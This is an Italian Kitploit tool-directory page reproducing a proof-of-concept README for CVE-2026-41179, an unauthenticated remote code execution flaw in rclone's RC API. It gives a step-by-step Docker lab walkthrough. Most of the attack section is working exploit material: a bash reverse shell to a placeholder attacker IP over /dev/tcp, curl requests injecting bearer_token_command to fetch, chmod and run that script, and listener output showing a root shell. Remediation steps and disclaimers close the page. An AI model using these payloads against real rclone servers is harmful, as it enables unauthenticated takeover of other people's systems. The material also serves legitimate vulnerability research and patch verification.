Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-41179 — POC per CVE-2026-41179 | Kitploit
Strumenti/GitHubGitHub/pssec-io/cve-2026-41179
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e FormazioneSviluppo PayloadLab e Pratica
GitHubpssec-io/cve-2026-41179

CVE-2026-41179

POC per CVE-2026-41179

Vedi Repository
1 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-41179 — RCE non autenticata nell'API RC di rclone

⚠️ SOLO A SCOPO EDUCATIVO Questo repository è destinato esclusivamente alla ricerca sulla sicurezza, all'istruzione e agli ambienti di laboratorio autorizzati. PSSec e i collaboratori di questo repository non approvano, supportano né si assumono alcuna responsabilità per qualsiasi uso non autorizzato, illegale o dannoso delle informazioni, del codice o delle tecniche qui contenuti. Utilizzando questo repository accetti di essere l'unico responsabile delle tue azioni e di testare esclusivamente sistemi di tua proprietà o per i quali hai esplicito permesso scritto.


Panoramica

CVE-2026-41179 è una vulnerabilità critica di Remote Code Execution (RCE) non autenticata nell'API di Remote Control (RC) integrata di rclone, che interessa le versioni dalla 1.48.0 alla 1.73.4.

DettaglioValore
CVECVE-2026-41179
Punteggio CVSS9.8 (Critico)
Versioni interessaterclone 1.48.0 – 1.73.4
Versione con patchrclone 1.73.5
ComponenteRC API (endpoint /operations/fsinfo)
Vettore d'attaccoRete — nessuna autenticazione richiesta

Come Funziona

rclone include un'interfaccia HTTP integrata per il controllo remoto (rcd). L'endpoint /operations/fsinfo accetta una stringa fs= fornita dall'utente che viene analizzata e utilizzata per istanziare un backend, incluso il backend WebDAV. Il backend WebDAV supporta un parametro bearer_token_command, che viene passato direttamente a exec.Command() senza sanificazione. Poiché su questo endpoint non è richiesta alcuna autenticazione per impostazione predefinita, un attaccante non autenticato può attivare l'esecuzione arbitraria di comandi del sistema operativo con l'utente del processo rclone.

Catena d'attacco in breve:

root@kitploit:~
POST /operations/fsinfo (no auth)
  → rc.GetFs() parses attacker-controlled fs= string
    → WebDAV backend instantiated with attacker params
      → bearer_token_command extracted
        → exec.Command() fires OS command
          → RCE as rclone process user

Struttura del Repository

root@kitploit:~
CVE-2026-41179/
├── Dockerfile.rclone          # Vulnerable rclone image (v1.69.3)
├── patched.Dockerfile.rclone  # Patched rclone image (v1.73.5)
├── poc.sh                     # Reverse shell payload
└── instructions               # Step-by-step lab walkthrough

Configurazione del Laboratorio e Sfruttamento (Passo per Passo)

Prerequisiti

  • Docker
  • Un listener: penelope o netcat
  • Python 3 (per servire il payload)

Passaggio 1 — Crea l'immagine Docker vulnerabile

root@kitploit:~
docker build -t rclone-vuln -f Dockerfile.rclone .

Crea un container Debian-slim che esegue rclone v1.69.3 con l'API RC esposta sulla porta 5572.


Passaggio 2 — Esegui il container vulnerabile

root@kitploit:~
docker run -d --name rclone-vuln -p 5572:5572 rclone-vuln

L'API RC è ora accessibile senza autenticazione su http://127.0.0.1:5572.


Passaggio 3 — Avvia il tuo listener

root@kitploit:~
penelope -p 5555
# OR
nc -lvnp 5555

Passaggio 4 — Configura il payload della reverse shell

Modifica poc.sh e imposta l'IP dell'attaccante e la porta in ascolto:

root@kitploit:~
#!/bin/bash
bash -i >& /dev/tcp/<attacker-ip>/<listening-port> 0>&1

Passaggio 5 — Servi il payload via HTTP

Esegui questo dalla stessa directory di poc.sh:

root@kitploit:~
python3 -m http.server 8888

Passaggio 6 — Scarica il payload sul target

root@kitploit:~
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
  --data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/usr/bin/curl -o /tmp/shell.sh http://<attacker-ip>:8888/poc.sh':'

Passaggio 7 — Rendi eseguibile il payload

root@kitploit:~
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
  --data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/bin/chmod +x /tmp/shell.sh':'

Passaggio 8 — Esegui il payload

root@kitploit:~
curl -sS -X POST http://127.0.0.1:5572/operations/fsinfo \
  --data-urlencode "fs=:webdav,url='http://127.0.0.1/',vendor=other,bearer_token_command='/tmp/shell.sh':'

Passaggio 9 — Cattura la shell

Controlla il tuo listener — dovresti ricevere una shell di root dal container:

root@kitploit:~
[+] Got reverse shell from f7697b831050~172.17.0.3-Linux-x86_64
[+] Shell upgraded successfully using /usr/bin/script!
whoami
root

Passaggio 10 — Verifica la patch

Ripeti i passaggi 1–8 utilizzando l'immagine con patch per confermare che la vulnerabilità sia stata risolta:

root@kitploit:~
docker build -t rclone-patched -f patched.Dockerfile.rclone .
docker run -d --name rclone-patched -p 5573:5572 rclone-patched

Invia la stessa richiesta curl sulla porta 5573 — il comando non dovrebbe essere eseguito.


Rimedio

  • Aggiorna rclone alla v1.73.5 o successiva — l'autenticazione è ora applicata su tutti gli endpoint RC per impostazione predefinita.
  • Se non puoi aggiornare immediatamente, avvia rcd con i flag --rc-user e --rc-pass per richiedere le credenziali.
  • Limita l'accesso di rete alla porta RC (5572) tramite regole del firewall — non dovrebbe mai essere esposta a reti non attendibili.
  • Valuta di utilizzare esplicitamente --rc-no-auth=false (il nuovo valore predefinito nelle versioni con patch) negli script di avvio.

Disclaimer

Questo repository è fornito solo a scopo educativo e di ricerca sulla sicurezza autorizzata. Il codice proof-of-concept dimostra una vulnerabilità reale in un ambiente di laboratorio Docker controllato.

PSSec e tutti i collaboratori:

  • Non autorizzano né incoraggiano lo sfruttamento di sistemi senza esplicita autorizzazione scritta del proprietario del sistema.
  • Non si assumono alcuna responsabilità per danni, perdita di dati, conseguenze legali o usi impropri derivanti dall'utilizzo di questo materiale.
  • Raccomandano che tutti i test vengano eseguiti solo in ambienti di laboratorio isolati di tua proprietà o per i quali hai esplicita autorizzazione a testare.

L'uso non autorizzato di questo codice contro sistemi di produzione o sistemi che non possiedi potrebbe violare le leggi sulla frode informatica e sui crimini informatici della tua giurisdizione.


CVE-2026-41179 — Ricerca di PSSec

Scarica lo strumento